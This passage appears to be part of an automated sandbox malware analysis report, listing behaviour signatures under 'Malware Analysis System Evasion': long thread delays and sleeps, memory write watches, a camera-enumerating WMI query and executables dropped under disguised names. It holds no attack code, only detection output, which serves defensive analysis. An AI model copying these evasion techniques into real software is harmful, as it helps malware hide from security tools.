                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1740000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1B480000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1580000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1B350000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: E00000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1A870000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 14E0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1B1D0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: FE0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1AC40000 memory reserve | memory write watch
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: CA0000 memory reserve | memory write watch
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1A750000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 650000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1A3F0000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1430000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1AFC0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1450000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1B190000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 9E0000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 29B0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeMemory allocated: 1A9F0000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1440000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeMemory allocated: 1B090000 memory reserve | memory write watch
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 600000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599868
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599734
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599625
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599484
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599304
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599178
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 599000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 3600000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598609
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598426
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598297
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598185
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 598077
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597968
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597858
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597749
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597639
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597515
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597297
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 597109
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596701
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596593
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596483
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596369
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596240
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596125
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 596014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595905
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595796
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595685
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595576
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595468
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595359
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595249
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595140
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 595014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594844
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594656
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594261
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594123
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 594014
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593904
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593785
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593632
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593508
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593405
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 300000
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593296
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593187
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 593077
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592968
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592852
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592749
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592635
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592514
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592405
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592296
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 592184
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591981
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591531
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591339
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 591234
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeThread delayed: delay time: 922337203685477
                                    Source: C:\hyperContaineragent\Bridgecommon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2483
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2293
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2122
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2314
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3804
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2126
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWindow / User API: threadDelayed 9156
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeDropped PE file which has not been started: C:\Users\user\Desktop\izhrsOEp.log
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeDropped PE file which has not been started: C:\Users\user\Desktop\WWLLRmVS.log
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\tYJQSSrA.log
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEEoXuLc.log
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 2483 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576Thread sleep count: 2293 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -3689348814741908s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep count: 2122 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1804Thread sleep count: 2314 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744Thread sleep count: 3804 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 2126 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 4908Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\hyperContaineragent\Bridgecommon.exe TID: 1244Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6184Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe TID: 8068Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 7692Thread sleep time: -30000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -31359464925306218s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -600000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599868s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599734s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599625s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599484s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599304s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599178s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -599000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598844s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6208Thread sleep time: -10800000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598609s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598426s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598297s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598185s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -598077s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597968s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597858s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597749s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597639s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597515s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597297s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -597109s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596844s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596701s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596593s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596483s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596369s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596240s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596125s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -596014s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595905s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595796s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595685s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595576s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595468s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595359s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595249s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595140s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -595014s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594844s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594656s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594261s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594123s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -594014s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593904s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593785s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593632s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593508s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593405s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6208Thread sleep time: -300000s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593296s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593187s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -593077s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592968s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592852s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592749s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592635s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592514s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592405s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592296s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -592184s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591981s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591531s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591339s >= -30000s
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe TID: 6216Thread sleep time: -591234s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 6572Thread sleep time: -30000s >= -30000s
